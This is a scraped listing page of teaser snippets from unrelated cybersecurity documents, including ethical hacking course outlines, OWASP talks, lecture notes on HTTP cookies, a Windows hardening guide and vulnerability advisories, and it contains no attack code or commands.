More informationCurso: Ethical Hacking and Countermeasures
Curso: Ethical Hacking and Countermeasures Module 1: Introduction to Ethical Hacking Who is a Hacker? Essential Terminologies Effects of Hacking Effects of Hacking on Business Elements of Information Security
More informationThe Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else
The Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else Paula Januszkiewicz CQURE: CEO, Penetration Tester CQURE Offices: New York, Dubai, Warsaw MVP: Enterprise Security,
More informationQuick Heal AntiVirus Pro Advanced. Protects your computer from viruses, malware, and Internet threats.
AntiVirus Pro Advanced Protects your computer from viruses, malware, and Internet threats. Features List Ransomware Protection anti-ransomware feature is more effective and advanced than other anti-ransomware
More informationVendor: Microsoft. Exam Code: Exam Name: MTA Security Fundamentals Practice Test. Version: Demo
Vendor: Microsoft Exam Code: 98-367 Exam Name: MTA Security Fundamentals Practice Test Version: Demo DEMO QUESTION 1 To prevent users from copying data to removable media, you should: A. Lock the computer
More informationSecurity in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren
Security in a Mainframe Emulator Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren October 25, 2017 Table of Contents Introduction... 2 About this paper...
More informationWhy bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?
Jeroen van Beek 1 Why bother? Causes of data breaches OWASP Top ten attacks Now what? Do it yourself Questions? 2 In many cases the web application stores: Credit card details Personal information Passwords
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
More informationCOPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51
Acknowledgments Introduction Part I: The Basics in Depth 1 Chapter 1: Windows Attacks 3 Attack Classes 3 Automated versus Dedicated Attacker 4 Remote versus Local 7 Types of Attacks 8 Dedicated Manual
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationRBS NetGain Enterprise Manager Multiple Vulnerabilities of 11
RBS-2018-004 NetGain Enterprise Manager Multiple Vulnerabilities 2018-03-22 1 of 11 Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationCross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft
Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft Who are we? Chris Evans Troublemaker, Engineer, Tech Lead, Google Security Team
More informationBecoming the Adversary
SESSION ID: CIN-R06 Becoming the Adversary Tyrone Erasmus Managing Security Consultant MWR InfoSecurity @metall0id /usr/bin/whoami Most public research == Android Something different today 2 Overview Introduction
More informationThis slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in
1 This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in terms of prevalence (how much the vulnerability is widespread),
More informationWeb security: an introduction to attack techniques and defense methods
Web security: an introduction to attack techniques and defense methods Mauro Gentile Web Application Security (Elective in Computer Networks) F. d'amore Dept. of Computer, Control, and Management Engineering
More information